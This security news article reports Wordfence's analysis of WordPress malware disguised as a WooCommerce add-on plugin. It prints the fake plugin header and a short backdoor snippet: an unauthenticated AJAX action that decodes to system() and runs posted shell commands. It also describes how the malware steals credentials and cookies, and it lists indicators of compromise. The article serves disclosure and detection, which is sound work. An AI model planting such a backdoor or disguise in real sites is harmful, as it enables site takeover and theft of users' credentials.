New WordPress Malware Masquerades as Legit Plugin with Data Exfiltration and RCE Capabilities

The Wordfence Threat Intelligence team has uncovered a deceptive and highly persistent WordPress malware variant that disguises itself as a legitimate plugin—complete with a comment header, administrative UI, and multiple layers of obfuscation. Despite its appearance, this malware silently siphons sensitive data, including login cookies and administrator credentials, and enables remote code execution.

“This piece of malware contains code that ensures it remains hidden in the administrator dashboard. It has a password extraction feature… an AJAX-based remote code execution mechanism and unfinished code suggesting it is still in development,” Wordfence explains. The malware was first identified during a site cleanup on April 24, 2025.

The malware lives in its own directory under /wp-contents/plugins/ and contains what appears to be a legitimate plugin header, even mimicking known plugins like WooCommerce Product Add-ons:

<?php
/*
 * Plugin Name: WooCommerce Product Add-ons
 * Plugin URI: https://woocommerce.com/products/product-add-ons/
 * Description: Extend your WooCommerce products with custom fields, checkboxes, dropdowns, and more. Perfect for personalized products.
 * Author: WooCommerce
 * Author URI: https://woocommerce.com/
 * Version: 6.4.0
 * Text Domain: woocommerce-product-addons
 * License: GPLv2 or later
 * Requires PHP: 7.0
 * Requires at least: 5.6
 * WC requires at least: 6.0
 * WC tested up to: 8.0
 */

“We would like to stress that this does not mean the WooCommerce plugin is in any way associated with the malware,”  the team notes.

To avoid detection, the malware uses the all_plugins filter to hide itself from the Plugins page in the WordPress admin interface.

The malware is equipped with an exfiltration mechanism that transmits sensitive user data to a Command and Control (C2) server, the URL of which is stored in the WordPress wp_options table.

Using cookies and AJAX actions, the malware gathers:

• WordPress usernames and email addresses
• Session cookies
• IP address and user-agent
• Login credentials (via wp_login and authenticate hooks)

“The cookies can be used to hijack the user’s session and perform actions on their behalf,” the report states. The data is sent to the attacker’s server via base64 encoding and ROT13 encryption to obscure detection.

The malware also registers a nopriv AJAX action, meaning it can be triggered without authentication:

add_action('wp_ajax_nopriv_redacted', function() {
    if (isset($_POST['redacted'])) {
        $class = new ReflectionFunction(convert_uudecode("&<WES=&5M`")); $class->invoke($_POST['redacted']);
    }
});

This decodes and invokes the system() function, executing arbitrary shell commands. A second AJAX endpoint appears incomplete, implying the malware is still under development.

A second plugin discovered during the same site cleanup used slightly different hiding techniques and added:

• JavaScript injection via wp_enqueue_scripts
• A malformed header injection hook
• A glob() call to include server-side cached files

“Perhaps this code was tested locally by a hacker and somehow snuck into this plugin.”

Wordfence recommends checking for the following IoCs:

• Hidden plugin files in /wp-content/plugins/ not visible in the admin UI
• Redirection to external payment gateways
• Presence of the API_SN_CLOUDSERVER option in your database
• Access logs showing the configure_cloudserver parameter
• Presence of the custom_reporter_timer cookie

Related Posts:

• WordPress Malware Alert: Fake Anti-Malware Plugin Grants Admin Access and Executes Remote Code
• Breaking News: Widespread WordPress Plugin Compromise in Active Supply Chain Attack
• Captcha Plugin include backdoor that affects 300K WordPress sites
• WordPress Issues Urgent Security Update to Patch Multiple Vulnerabilities